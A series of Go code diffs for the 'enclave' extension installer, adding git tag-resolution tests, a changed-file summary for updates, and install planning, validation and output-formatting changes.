+// FETCH_HEAD lands on that object too, so nothing downstream would notice a
+// tag id being recorded as "the exact commit installed" — in the provenance
+// sidecar, in `list --json`, and in the result envelope.
+func TestGitFetcherAnnotatedTagRecordsCommit(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	runGitFixture(t, repo, "tag", "-a", "v1.0.0", "-m", "release")
+	fetcher, err := NewGitFetcher(false)
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	tagObject := strings.TrimSpace(runGitFixture(t, repo, "rev-parse", "v1.0.0"))
+	commit := strings.TrimSpace(runGitFixture(t, repo, "rev-parse", "v1.0.0^{commit}"))
+	if tagObject == commit {
+		t.Fatal("fixture tag is not annotated")
+	}
+
+	resolved, err := fetcher.ResolveRef(context.Background(), repo, "v1.0.0")
+	if err != nil {
+		t.Fatalf("ResolveRef: %v", err)
+	}
+	if resolved.RefType != RefTypeTag {
+		t.Fatalf("refType = %q, want tag", resolved.RefType)
+	}
+	if resolved.Commit != commit {
+		t.Fatalf("resolved commit = %q, want the commit %q, not the tag object %q", resolved.Commit, commit, tagObject)
+	}
+
+	opened, err := fetcher.OpenAt(context.Background(), repo, resolved)
+	if err != nil {
+		t.Fatalf("OpenAt: %v", err)
+	}
+	defer opened.Close()
+	if opened.Commit() != commit {
+		t.Fatalf("fetched commit = %q, want %q", opened.Commit(), commit)
+	}
+
+	// A --ref naming the tag object by SHA is a pin like any other: it is
+	// honored, since that is the object fetched, and still records a commit.
+	pinned, err := fetcher.Open(context.Background(), repo, tagObject)
+	if err != nil {
+		t.Fatalf("Open(tag object sha): %v", err)
+	}
+	defer pinned.Close()
+	if pinned.Commit() != commit {
+		t.Fatalf("pinned commit = %q, want %q", pinned.Commit(), commit)
+	}
+}
+
+func TestParseLsRemotePrefersPeeledTagAndBranch(t *testing.T) {
+	const (
+		branch    = "1111111111111111111111111111111111111111"
+		tagObject = "2222222222222222222222222222222222222222"
+		tagCommit = "3333333333333333333333333333333333333333"
+	)
+	annotated := strings.Join([]string{
+		tagObject + "\trefs/tags/v1",
+		tagCommit + "\trefs/tags/v1^{}",
+	}, "\n")
+
+	got, ok := parseLsRemote(annotated, "v1")
+	if !ok || got.Commit != tagCommit || got.RefType != RefTypeTag {
+		t.Errorf("annotated tag = %+v (%v), want the peeled commit", got, ok)
+	}
+
+	// A branch outranks a same-named tag, and the tag's peeled line must not
+	// leak into the branch's commit.
+	got, ok = parseLsRemote(branch+"\trefs/heads/v1\n"+annotated, "v1")
+	if !ok || got.Commit != branch || got.RefType != RefTypeBranch {
+		t.Errorf("branch and tag = %+v (%v), want the branch", got, ok)
+	}
+
+	got, ok = parseLsRemote(tagCommit+"\trefs/tags/v1", "v1")
+	if !ok || got.Commit != tagCommit || got.RefType != RefTypeTag {
+		t.Errorf("lightweight tag = %+v (%v), want its own object id", got, ok)
+	}
+
+	if _, ok = parseLsRemote(branch+"\trefs/heads/other", "v1"); ok {
+		t.Error("parseLsRemote matched a ref it was not asked for")
+	}
+}
+
 func TestGitFetcherOpenListsFilesWithoutMaterializing(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{
 		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",

--- a/internal/extinstall/filediff.go
+++ b/internal/extinstall/filediff.go
@@ -1,0 +1,81 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+	"io"
+	"sort"
+)
+
+// maxChangedFilesShown bounds how many changed paths update prints before
+// falling back to a count, so a large refactor in the source does not turn
+// the trust summary into pages of paths.
+const maxChangedFilesShown = 10
+
+// changedFile is one path that differs between the installed ("before") and
+// staged ("after") extension trees.
+type changedFile struct {
+	Path   string
+	Status string // "added", "removed", or "modified"
+}
+
+// treeChanges reports what the staged tree changes about the installed one,
+// along with the staged tree's manifest so its hash can be reused instead of
+// read again. The changed-file list is advisory output, so an unreadable tree
+// (a nil before, or a failed read of afterDir) yields no changes rather than
+// failing the install.
+func treeChanges(before *treeManifest, afterDir string) ([]changedFile, treeManifest) {
+	after, err := readTreeManifest(afterDir)
+	if err != nil || before == nil {
+		return nil, treeManifest{}
+	}
+	return diffManifests(*before, after), after
+}
+
+// diffManifests compares two tree manifests by content and mode.
+func diffManifests(before treeManifest, after treeManifest) []changedFile {
+	var changes []changedFile
+	for rel, digest := range after.Files {
+		beforeDigest, ok := before.Files[rel]
+		switch {
+		case !ok:
+			changes = append(changes, changedFile{Path: rel, Status: "added"})
+		case beforeDigest != digest:
+			changes = append(changes, changedFile{Path: rel, Status: "modified"})
+		}
+	}
+	for rel := range before.Files {
+		if _, ok := after.Files[rel]; !ok {
+			changes = append(changes, changedFile{Path: rel, Status: "removed"})
+		}
+	}
+	sort.Slice(changes, func(i, j int) bool { return changes[i].Path < changes[j].Path })
+	return changes
+}
+
+// printChangedFiles renders the file-level diff, capping the listed paths at
+// maxChangedFilesShown and printing a remainder count beyond that so a large
+// change stays readable.
+func printChangedFiles(w io.Writer, changes []changedFile) {
+	if len(changes) == 0 {
+		return
+	}
+	_, _ = fmt.Fprintf(w, "  %d file(s) changed:\n", len(changes))
+	shown := changes
+	if len(shown) > maxChangedFilesShown {
+		shown = shown[:maxChangedFilesShown]
+	}
+	for _, change := range shown {
+		_, _ = fmt.Fprintf(w, "    %s %s\n", change.Status, change.Path)
+	}
+	if remaining := len(changes) - len(shown); remaining > 0 {
+		_, _ = fmt.Fprintf(w, "    … and %d more\n", remaining)
+	}
+	_, _ = fmt.Fprintln(w)
+}

--- a/internal/extinstall/filediff.go
+++ b/internal/extinstall/filediff.go
@@ -67,10 +67,7 @@ func printChangedFiles(w io.Writer, changes []changedFile) {
 		return
 	}
 	_, _ = fmt.Fprintf(w, "%s%d file(s) changed:\n", bodyIndent, len(changes))
-	shown := changes
-	if len(shown) > maxChangedFilesShown {
-		shown = shown[:maxChangedFilesShown]
-	}
+	shown := changes[:min(len(changes), maxChangedFilesShown)]
 	for _, change := range shown {
 		_, _ = fmt.Fprintf(w, "%s  %-8s %s\n", bodyIndent, change.Status, change.Path)
 	}

--- a/internal/extinstall/filediff.go
+++ b/internal/extinstall/filediff.go
@@ -66,16 +66,16 @@ func printChangedFiles(w io.Writer, changes []changedFile) {
 	if len(changes) == 0 {
 		return
 	}
-	_, _ = fmt.Fprintf(w, "  %d file(s) changed:\n", len(changes))
+	_, _ = fmt.Fprintf(w, "%s%d file(s) changed:\n", bodyIndent, len(changes))
 	shown := changes
 	if len(shown) > maxChangedFilesShown {
 		shown = shown[:maxChangedFilesShown]
 	}
 	for _, change := range shown {
-		_, _ = fmt.Fprintf(w, "    %s %s\n", change.Status, change.Path)
+		_, _ = fmt.Fprintf(w, "%s  %-8s %s\n", bodyIndent, change.Status, change.Path)
 	}
 	if remaining := len(changes) - len(shown); remaining > 0 {
-		_, _ = fmt.Fprintf(w, "    … and %d more\n", remaining)
+		_, _ = fmt.Fprintf(w, "%s  … and %d more\n", bodyIndent, remaining)
 	}
 	_, _ = fmt.Fprintln(w)
 }

--- a/internal/extinstall/install.go
+++ b/internal/extinstall/install.go
@@ -79,7 +79,7 @@ func Add(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
 	if len(match) == 0 {
 		if len(other) > 0 {
 			return nil, fmt.Errorf("%s contains %d %s extension(s) but no %s; use `enclave %s add`",
-				src.Display(), len(other), req.Kind.Other().Label(), req.Kind.Label(), req.Kind.Other().Verb())
+				src.Display(), len(other), req.Kind.Other().Label(), req.Kind.Label(), req.Kind.Other().DirName())
 		}
 		return nil, fmt.Errorf("%s contains no %s extension", src.Display(), req.Kind.Label())
 	}

--- a/internal/extinstall/install.go
+++ b/internal/extinstall/install.go
@@ -1,0 +1,435 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+// Package extinstall installs enclave tool and feature extensions from git
+// repositories into the user-global extension root.
+package extinstall
+
+import (
+	"context"
+	"fmt"
+	"maps"
+	"os"
+	"path/filepath"
+	"slices"
+	"sort"
+	"strings"
+	"time"
+
+	"enclave/internal/config"
+	"enclave/internal/model"
+)
+
+// installPlan is one extension's worth of work, shared by add and update.
+type installPlan struct {
+	Name    string
+	Source  source
+	RepoDir string // materialized source directory for this extension
+	Subpath string
+	Commit  string
+	Ref     string
+	RefType string
+	Action  string        // ActionInstalled or ActionUpdated
+	Before  *capabilities // previous capabilities, for the update diff
+	// BeforeTree is the installed tree as already read for the
+	// local-modification check, reused for the changed-file list. It is nil
+	// when that tree could not be read.
+	BeforeTree *treeManifest
+}
+
+// Add installs extensions of req.Kind from req.Source.
+func Add(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
+	src, err := parseSource(req.Source)
+	if err != nil {
+		return nil, err
+	}
+	if src, err = src.WithRef(req.Ref); err != nil {
+		return nil, err
+	}
+	if src, err = src.WithPath(req.Path); err != nil {
+		return nil, err
+	}
+
+	repo, err := env.Fetcher.Open(ctx, src.RemoteURL, src.Ref)
+	if err != nil {
+		return nil, err
+	}
+	defer repo.Close()
+
+	candidates, err := candidateDirs(repo.Files(), src.Subpath)
+	if err != nil {
+		return nil, fmt.Errorf("%s: %w", src.Display(), err)
+	}
+	if len(candidates) == 0 {
+		return nil, fmt.Errorf("%s contains no extension (no %s found)", src.Display(), config.SpecFilename)
+	}
+	if err := materializeCandidates(ctx, repo, candidates); err != nil {
+		return nil, err
+	}
+
+	match, other, skipped := selectKind(classify(repo.Dir(), candidates), req.Kind)
+	for _, entry := range skipped {
+		_, _ = fmt.Fprintf(env.narrate(), "skipping %s: %s\n", displayDir(entry.Dir), entry.Skip)
+	}
+	if len(match) == 0 {
+		if len(other) > 0 {
+			return nil, fmt.Errorf("%s contains %d %s extension(s) but no %s; use `enclave %s add`",
+				src.Display(), len(other), req.Kind.Other().Label(), req.Kind.Label(), req.Kind.Other().Verb())
+		}
+		return nil, fmt.Errorf("%s contains no %s extension", src.Display(), req.Kind.Label())
+	}
+
+	if err := detectNameCollisions(req.Kind, match); err != nil {
+		return nil, err
+	}
+
+	selected, err := selectExtensions(env, req, match)
+	if err != nil {
+		return nil, err
+	}
+
+	stage, err := newStaging(env, req.Kind, req.DryRun)
+	if err != nil {
+		return nil, err
+	}
+	defer stage.close()
+
+	results := make([]ActionResult, 0, len(selected))
+	for _, entry := range selected {
+		plan, planErr := planFor(env, req, src, repo, entry)
+		if planErr != nil {
+			results = append(results, ActionResult{Name: entry.Name, Action: ActionFailed, Error: planErr.Error()})
+			continue
+		}
+		if plan == nil {
+			results = append(results, ActionResult{Name: entry.Name, Action: ActionUnchanged, Commit: repo.Commit()})
+			continue
+		}
+		result, applyErr := applyPlan(env, req, *plan, stage)
+		if applyErr != nil {
+			result = ActionResult{Name: entry.Name, Action: ActionFailed, Error: applyErr.Error()}
+		}
+		results = append(results, result)
+	}
+	return results, nil
+}
+
+// materializeCandidates checks out the directories of every discovered
+// candidate. An empty Dir is the repository root: that extension owns the whole
+// tree, so no set of paths describes it and the checkout has to stay full. A
+// sparse cone naming the other candidates would bring in the root's files
+// without any of its subdirectories.
+func materializeCandidates(ctx context.Context, repo Repo, candidates []candidate) error {
+	dirs := make([]string, 0, len(candidates))
+	for _, cand := range candidates {
+		if cand.Dir == "" {
+			return repo.Materialize(ctx, nil)
+		}
+		dirs = append(dirs, cand.Dir)
+	}
+	return repo.Materialize(ctx, dirs)
+}
+
+// planFromRepo builds the shared part of an install plan: what to copy, and the
+// commit it came from.
+func planFromRepo(src source, repo Repo, entry classified, action string) installPlan {
+	return installPlan{
+		Name:    entry.Name,
+		Source:  src,
+		RepoDir: filepath.Join(repo.Dir(), filepath.FromSlash(entry.Dir)),
+		Subpath: entry.Dir,
+		Commit:  repo.Commit(),
+		Ref:     repo.Ref(),
+		RefType: repo.RefType(),
+		Action:  action,
+	}
+}
+
+func displayDir(dir string) string {
+	if dir == "" {
+		return "(repository root)"
+	}
+	return dir
+}
+
+// detectNameCollisions rejects a discovered set where two or more candidates
+// of the matching kind share a base name, naming every colliding directory so
+// the user can disambiguate with --path.
+func detectNameCollisions(kind model.ExtensionKind, match []classified) error {
+	dirsByName := map[string][]string{}
+	for _, entry := range match {
+		dirsByName[entry.Name] = append(dirsByName[entry.Name], displayDir(entry.Dir))
+	}
+	for _, name := range slices.Sorted(maps.Keys(dirsByName)) {
+		dirs := dirsByName[name]
+		if len(dirs) < 2 {
+			continue
+		}
+		sort.Strings(dirs)
+		return fmt.Errorf("multiple %s extensions named %q found (%s); disambiguate with --path",
+			kind.Label(), name, strings.Join(dirs, ", "))
+	}
+	return nil
+}
+
+// selectExtensions narrows discovered candidates using --name, --all, or a
+// prompt. It never guesses: a non-interactive run with several candidates and
+// no selector is an error.
+func selectExtensions(env Env, req Request, match []classified) ([]classified, error) {
+	if len(req.Names) > 0 {
+		byName := map[string]classified{}
+		for _, entry := range match {
+			byName[entry.Name] = entry
+		}
+		selected := make([]classified, 0, len(req.Names))
+		for _, name := range req.Names {
+			entry, ok := byName[name]
+			if !ok {
+				return nil, fmt.Errorf("no %s extension named %q in this source", req.Kind.Label(), name)
+			}
+			selected = append(selected, entry)
+		}
+		return selected, nil
+	}
+	if len(match) == 1 || req.All {
+		return match, nil
+	}
+
+	_, _ = fmt.Fprintf(env.narrate(), "found %d %s extensions:\n", len(match), req.Kind.Label())
+	for _, entry := range match {
+		_, _ = fmt.Fprintf(env.narrate(), "  %s\n", entry.Name)
+	}
+	if !req.Interactive {
+		return nil, fmt.Errorf("several %s extensions found; pass --name or --all", req.Kind.Label())
+	}
+	confirmed, err := env.confirm("install all?")
+	if err != nil {
+		return nil, err
+	}
+	if !confirmed {
+		return nil, fmt.Errorf("aborted; pass --name to install a subset")
+	}
+	return match, nil
+}
+
+// validExtensionName rejects a spec-declared name that is unsafe as an
+// extension identity: a repository-root extension takes its name straight from
+// the untrusted spec document, and that name becomes a path segment under the
+// destination directory, a build-context path, and an interpolation into the
+// generated Dockerfile.
+func validExtensionName(name string) error {
+	if err := config.ValidateExtensionName(name); err != nil {
+		return fmt.Errorf("invalid extension name: %s", config.ExtensionNameCharset)
+	}
+	return nil
+}
+
+// planFor resolves the collision policy for one discovered extension. It
+// returns (nil, nil) when the extension is already installed at this commit and
+// unmodified, which add reports as unchanged.
+func planFor(env Env, req Request, src source, repo Repo, entry classified) (*installPlan, error) {
+	if err := validExtensionName(entry.Name); err != nil {
+		return nil, err
+	}
+	target := filepath.Join(env.kindDir(req.Kind), entry.Name)
+	plan := planFromRepo(src, repo, entry, ActionInstalled)
+
+	if _, err := os.Stat(target); err != nil {
+		if os.IsNotExist(err) {
+			if builtinExists(env, req.Kind, entry.Name) && !req.Force {
+				return nil, fmt.Errorf("already exists as a built-in %s; installing would shadow it, pass --force to install anyway", req.Kind.Label())
+			}
+			return &plan, nil
+		}
+		return nil, err
+	}
+
+	origin, err := readOrigin(target)
+	if err != nil {
+		return nil, err
+	}
+	if origin == nil {
+		if !req.Force {
+			return nil, fmt.Errorf("already installed and was not installed by enclave; pass --force to replace it")
+		}
+		return &plan, nil
+	}
+
+	plan.Action = ActionUpdated
+	sameSource := origin.Remote == RedactRemote(src.RemoteURL) && origin.Subpath == entry.Dir
+	if !sameSource && !req.Force {
+		return nil, fmt.Errorf("already installed from %s; pass --force to replace it", origin.Source)
+	}
+
+	recorded := recordedTreeHash(*origin)
+	manifest, manifestErr := readTreeManifest(target)
+	if manifestErr != nil && recorded != "" {
+		return nil, manifestErr
+	}
+	modified := recorded != "" && manifest.Hash != recorded
+	if modified && !req.Force {
+		return nil, fmt.Errorf("has local modifications; pass --force to discard them")
+	}
+	if sameSource && !modified && origin.Commit == repo.Commit() {
+		return nil, nil
+	}
+
+	if manifestErr == nil {
+		plan.BeforeTree = &manifest
+	}
+	before, err := inspect(target, req.Kind)
+	if err == nil {
+		plan.Before = &before
+	}
+	return &plan, nil
+}
+
+// applyPlan stages, validates, summarizes, confirms, and installs one
+// extension. Nothing is written to the destination until the swap at the end,
+// so a validation failure or a declined prompt leaves the previous state alone.
+func applyPlan(env Env, req Request, plan installPlan, stage *staging) (ActionResult, error) {
+	staged := stage.extDir(plan.Name)
+	if err := copyExtensionTree(plan.RepoDir, staged, defaultLimits()); err != nil {
+		return ActionResult{}, err
+	}
+	defer stage.discard(plan.Name)
+
+	warnings, err := validateStaged(env, stage, plan.Name)
+	if err != nil {
+		return ActionResult{}, err
+	}
+	for _, warning := range warnings {
+		_, _ = fmt.Fprintf(env.narrate(), "warn: %s\n", warning)
+	}
+
+	caps, err := inspect(staged, req.Kind)
+	if err != nil {
+		return ActionResult{}, err
+	}
+	caps.ShadowsBuiltin = builtinExists(env, req.Kind, plan.Name)
+
+	target := stage.finalPath(plan.Name)
+	header := fmt.Sprintf("%s → %s %q @ %s", plan.Source.Display(), req.Kind.Label(), plan.Name, ShortCommit(plan.Commit))
+	var stagedHash string
+	// contentChanged decides what to promise about the image. Both tree hashes
+	// exclude the provenance sidecar, so comparing them answers it exactly; an
+	// unknown (an unreadable tree, or a fresh install with nothing to compare
+	// against) counts as changed.
+	contentChanged := true
+	if plan.Before != nil {
+		changes, stagedTree := treeChanges(plan.BeforeTree, staged)
+		stagedHash = stagedTree.Hash
+		contentChanged = plan.BeforeTree == nil || plan.BeforeTree.Hash != stagedHash
+		renderUpdate(env, header, changes, *plan.Before, caps)
+	} else {
+		caps.render(env.narrate(), header)
+	}
+
+	if req.DryRun {
+		_, _ = fmt.Fprintf(env.narrate(), "\ndry run: %s would be written to %s\n", plan.Name, target)
+		return ActionResult{Name: plan.Name, Action: ActionSkipped, Commit: plan.Commit, Path: target}, nil
+	}
+	if req.Interactive {
+		stage.touch(env)
+		question := fmt.Sprintf("\n%s %s?", verbFor(plan.Action), target)
+		confirmed, confirmErr := env.confirm(question)
+		if confirmErr != nil {
+			return ActionResult{}, confirmErr
+		}
+		if !confirmed {
+			return ActionResult{}, fmt.Errorf("aborted; nothing %s", plan.Action)
+		}
+	}
+	stage.touch(env)
+
+	installedPath, err := stage.commit(env, plan.Name, func(installedPath string) error {
+		treeHash := stagedHash
+		if treeHash == "" {
+			var hashErr error
+			if treeHash, hashErr = TreeHash(installedPath); hashErr != nil {
+				return hashErr
+			}
+		}
+		origin := Origin{
+			SchemaVersion: OriginSchemaVersion,
+			Kind:          string(req.Kind),
+			Name:          plan.Name,
+			Remote:        RedactRemote(plan.Source.RemoteURL),
+			Source:        RedactRemote(plan.Source.Raw),
+			Subpath:       plan.Subpath,
+			Ref:           plan.Ref,
+			RefType:       plan.RefType,
+			Commit:        plan.Commit,
+			InstalledAt:   env.now().UTC().Format(time.RFC3339),
+			InstalledBy:   env.Version,
+			TreeHash:      treeHash,
+		}
+		return WriteOrigin(installedPath, origin)
+	})
+	if err != nil {
+		return ActionResult{}, err
+	}
+
+	_, _ = fmt.Fprintf(env.narrate(), "%s %s %q at %s\n", plan.Action, req.Kind.Label(), plan.Name, installedPath)
+	printPostInstallHints(env, req.Kind, plan.Name, caps, contentChanged)
+	return ActionResult{Name: plan.Name, Action: plan.Action, Commit: plan.Commit, Path: installedPath, Warnings: warnings}, nil
+}
+
+func verbFor(action string) string {
+	if action == ActionUpdated {
+		return "Update"
+	}
+	return "Install to"
+}
+
+// renderUpdate shows an update's trust summary: the changed-file list
+// followed by the capability diff.
+func renderUpdate(env Env, header string, changedFiles []changedFile, before capabilities, after capabilities) {
+	_, _ = fmt.Fprintf(env.narrate(), "%s\n\n", header)
+	printChangedFiles(env.narrate(), changedFiles)
+	changes := diffCapabilities(before, after)
+	if len(changes) == 0 {
+		_, _ = fmt.Fprintf(env.narrate(), "  no capability changes\n")
+		return
+	}
+	for _, change := range changes {
+		_, _ = fmt.Fprintf(env.narrate(), "  %s\n", change)
+	}
+}
+
+// printPostInstallHints tells the user what to do next: the image rebuilds on
+// its own when the extension's content changed, but an opt-in feature still has
+// to be enabled. The image identity hash is content-based and excludes the
+// provenance sidecar, so re-pinning to a new commit that carries identical
+// content rebuilds nothing and must not say otherwise.
+func printPostInstallHints(env Env, kind model.ExtensionKind, name string, caps capabilities, contentChanged bool) {
+	if contentChanged {
+		_, _ = fmt.Fprintf(env.narrate(), "the next run rebuilds the image\n")
+	}
+	if kind != model.KindFeature {
+		return
+	}
+	if caps.Spec.DefaultEnabled != nil && !*caps.Spec.DefaultEnabled {
+		_, _ = fmt.Fprintf(env.narrate(), "enable it with: enclave --features +%s\n", name)
+	}
+}
+
+// validateStaged runs config's user-extension validation against the staged
+// copy of one extension, which is checked exactly as it would be once
+// installed. Errors abort: --force overrides collisions, never validity.
+func validateStaged(env Env, stage *staging, name string) ([]string, error) {
+	result := config.ValidateExtensionDir(stage.extDir(name), stage.kind, env.Paths)
+	if len(result.Errors) > 0 {
+		return result.Warnings, fmt.Errorf("%s", strings.Join(result.Errors, "; "))
+	}
+	return result.Warnings, nil
+}
+
+func builtinExists(env Env, kind model.ExtensionKind, name string) bool {
+	builtinDir, _ := config.ResolveExtensionDirs(env.Paths, kind, name)
+	return builtinDir != ""
+}

--- a/internal/extinstall/install.go
+++ b/internal/extinstall/install.go
@@ -21,6 +21,7 @@ import (
 	"time"
 
 	"enclave/internal/config"
+	"enclave/internal/logx"
 	"enclave/internal/model"
 )
 
@@ -73,7 +74,7 @@ func Add(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
 
 	match, other, skipped := selectKind(classify(repo.Dir(), candidates), req.Kind)
 	for _, entry := range skipped {
-		_, _ = fmt.Fprintf(env.narrate(), "skipping %s: %s\n", displayDir(entry.Dir), entry.Skip)
+		env.outcome(env.Style, markWarn, logx.ColorYellow, "skipping %s: %s", displayDir(entry.Dir), entry.Skip)
 	}
 	if len(match) == 0 {
 		if len(other) > 0 {
@@ -115,6 +116,7 @@ func Add(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
 		}
 		results = append(results, result)
 	}
+	env.summarize(env.Style, req.Kind.Label(), results, req.DryRun)
 	return results, nil
 }
 
@@ -199,14 +201,14 @@ func selectExtensions(env Env, req Request, match []classified) ([]classified, e
 		return match, nil
 	}
 
-	_, _ = fmt.Fprintf(env.narrate(), "found %d %s extensions:\n", len(match), req.Kind.Label())
+	_, _ = fmt.Fprintf(env.narrate(), "\nFound %d %s extensions:\n\n", len(match), req.Kind.Label())
 	for _, entry := range match {
-		_, _ = fmt.Fprintf(env.narrate(), "  %s\n", entry.Name)
+		_, _ = fmt.Fprintf(env.narrate(), "%s%s %s\n", bodyIndent, env.Style.paint(markInfo, logx.ColorDim), entry.Name)
 	}
 	if !req.Interactive {
 		return nil, fmt.Errorf("several %s extensions found; pass --name or --all", req.Kind.Label())
 	}
-	confirmed, err := env.confirm("install all?")
+	confirmed, err := env.confirm(fmt.Sprintf("\n%sInstall all?", bodyIndent))
 	if err != nil {
 		return nil, err
 	}
@@ -298,12 +300,21 @@ func applyPlan(env Env, req Request, plan installPlan, stage *staging) (ActionRe
 	}
 	defer stage.discard(plan.Name)
 
+	// The section opens before any validation so that everything this
+	// extension has to say, warnings and failures included, lands inside its
+	// own block rather than between the previous extension's block and this
+	// one's.
+	env.section(env.Style, plan.Name, fmt.Sprintf("%s @ %s", req.Kind.Label(), ShortCommit(plan.Commit)))
+
 	warnings, err := validateStaged(env, stage, plan.Name)
 	if err != nil {
 		return ActionResult{}, err
 	}
 	for _, warning := range warnings {
-		_, _ = fmt.Fprintf(env.narrate(), "warn: %s\n", warning)
+		env.outcome(env.Style, markWarn, logx.ColorYellow, "%s", warning)
+	}
+	if len(warnings) > 0 {
+		_, _ = fmt.Fprintln(env.narrate())
 	}
 
 	caps, err := inspect(staged, req.Kind)
@@ -313,7 +324,6 @@ func applyPlan(env Env, req Request, plan installPlan, stage *staging) (ActionRe
 	caps.ShadowsBuiltin = builtinExists(env, req.Kind, plan.Name)
 
 	target := stage.finalPath(plan.Name)
-	header := fmt.Sprintf("%s → %s %q @ %s", plan.Source.Display(), req.Kind.Label(), plan.Name, ShortCommit(plan.Commit))
 	var stagedHash string
 	// contentChanged decides what to promise about the image. Both tree hashes
 	// exclude the provenance sidecar, so comparing them answers it exactly; an
@@ -324,18 +334,18 @@ func applyPlan(env Env, req Request, plan installPlan, stage *staging) (ActionRe
 		changes, stagedTree := treeChanges(plan.BeforeTree, staged)
 		stagedHash = stagedTree.Hash
 		contentChanged = plan.BeforeTree == nil || plan.BeforeTree.Hash != stagedHash
-		renderUpdate(env, header, changes, *plan.Before, caps)
+		renderUpdate(env, changes, *plan.Before, caps)
 	} else {
-		caps.render(env.narrate(), header)
+		caps.render(env.narrate(), env.Style, plan.Source.Display())
 	}
 
 	if req.DryRun {
-		_, _ = fmt.Fprintf(env.narrate(), "\ndry run: %s would be written to %s\n", plan.Name, target)
+		env.outcome(env.Style, markInfo, logx.ColorCyan, "dry run: would be written to %s", target)
 		return ActionResult{Name: plan.Name, Action: ActionSkipped, Commit: plan.Commit, Path: target}, nil
 	}
 	if req.Interactive {
 		stage.touch(env)
-		question := fmt.Sprintf("\n%s %s?", verbFor(plan.Action), target)
+		question := fmt.Sprintf("%s%s %s?", bodyIndent, verbFor(plan.Action), target)
 		confirmed, confirmErr := env.confirm(question)
 		if confirmErr != nil {
 			return ActionResult{}, confirmErr
@@ -374,7 +384,7 @@ func applyPlan(env Env, req Request, plan installPlan, stage *staging) (ActionRe
 		return ActionResult{}, err
 	}
 
-	_, _ = fmt.Fprintf(env.narrate(), "%s %s %q at %s\n", plan.Action, req.Kind.Label(), plan.Name, installedPath)
+	env.outcome(env.Style, markOK, logx.ColorGreen, "%s at %s", plan.Action, installedPath)
 	printPostInstallHints(env, req.Kind, plan.Name, caps, contentChanged)
 	return ActionResult{Name: plan.Name, Action: plan.Action, Commit: plan.Commit, Path: installedPath, Warnings: warnings}, nil
 }
@@ -387,18 +397,18 @@ func verbFor(action string) string {
 }
 
 // renderUpdate shows an update's trust summary: the changed-file list
-// followed by the capability diff.
-func renderUpdate(env Env, header string, changedFiles []changedFile, before capabilities, after capabilities) {
-	_, _ = fmt.Fprintf(env.narrate(), "%s\n\n", header)
+// followed by the capability diff. The caller has already opened the section.
+func renderUpdate(env Env, changedFiles []changedFile, before capabilities, after capabilities) {
 	printChangedFiles(env.narrate(), changedFiles)
 	changes := diffCapabilities(before, after)
 	if len(changes) == 0 {
-		_, _ = fmt.Fprintf(env.narrate(), "  no capability changes\n")
+		_, _ = fmt.Fprintf(env.narrate(), "%s%s\n\n", bodyIndent, env.Style.paint("no capability changes", logx.ColorDim))
 		return
 	}
 	for _, change := range changes {
-		_, _ = fmt.Fprintf(env.narrate(), "  %s\n", change)
+		_, _ = fmt.Fprintf(env.narrate(), "%s%s\n", bodyIndent, change)
 	}
+	_, _ = fmt.Fprintln(env.narrate())
 }
 
 // printPostInstallHints tells the user what to do next: the image rebuilds on
@@ -408,13 +418,13 @@ func renderUpdate(env Env, header string, changedFiles []changedFile, before cap
 // content rebuilds nothing and must not say otherwise.
 func printPostInstallHints(env Env, kind model.ExtensionKind, name string, caps capabilities, contentChanged bool) {
 	if contentChanged {
-		_, _ = fmt.Fprintf(env.narrate(), "the next run rebuilds the image\n")
+		env.note(env.Style, "the next run rebuilds the image")
 	}
 	if kind != model.KindFeature {
 		return
 	}
 	if caps.Spec.DefaultEnabled != nil && !*caps.Spec.DefaultEnabled {
-		_, _ = fmt.Fprintf(env.narrate(), "enable it with: enclave --features +%s\n", name)
+		env.note(env.Style, "enable it with: enclave --features +%s", name)
 	}
 }
 

--- a/internal/extinstall/install.go
+++ b/internal/extinstall/install.go
@@ -74,7 +74,7 @@ func Add(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
 
 	match, other, skipped := selectKind(classify(repo.Dir(), candidates), req.Kind)
 	for _, entry := range skipped {
-		env.outcome(env.Style, markWarn, logx.ColorYellow, "skipping %s: %s", displayDir(entry.Dir), entry.Skip)
+		env.outcome(markWarn, logx.ColorYellow, "skipping %s: %s", displayDir(entry.Dir), entry.Skip)
 	}
 	if len(match) == 0 {
 		if len(other) > 0 {
@@ -84,7 +84,7 @@ func Add(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
 		return nil, fmt.Errorf("%s contains no %s extension", src.Display(), req.Kind.Label())
 	}
 
-	if err := detectNameCollisions(req.Kind, match); err != nil {
+	if err := detectNameCollisions(req.Kind, match, req.Names); err != nil {
 		return nil, err
 	}
 
@@ -116,7 +116,7 @@ func Add(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
 		}
 		results = append(results, result)
 	}
-	env.summarize(env.Style, req.Kind.Label(), results, req.DryRun)
+	env.summarize(req.Kind.Label(), results, req.DryRun)
 	return results, nil
 }
 
@@ -160,10 +160,15 @@ func displayDir(dir string) string {
 
 // detectNameCollisions rejects a discovered set where two or more candidates
 // of the matching kind share a base name, naming every colliding directory so
-// the user can disambiguate with --path.
-func detectNameCollisions(kind model.ExtensionKind, match []classified) error {
+// the user can disambiguate with --path. Only the names about to be installed
+// are checked: when --name picks one extension, a duplicate pair elsewhere in
+// the repository is none of that install's business.
+func detectNameCollisions(kind model.ExtensionKind, match []classified, wanted []string) error {
 	dirsByName := map[string][]string{}
 	for _, entry := range match {
+		if len(wanted) > 0 && !slices.Contains(wanted, entry.Name) {
+			continue
+		}
 		dirsByName[entry.Name] = append(dirsByName[entry.Name], displayDir(entry.Dir))
 	}
 	for _, name := range slices.Sorted(maps.Keys(dirsByName)) {
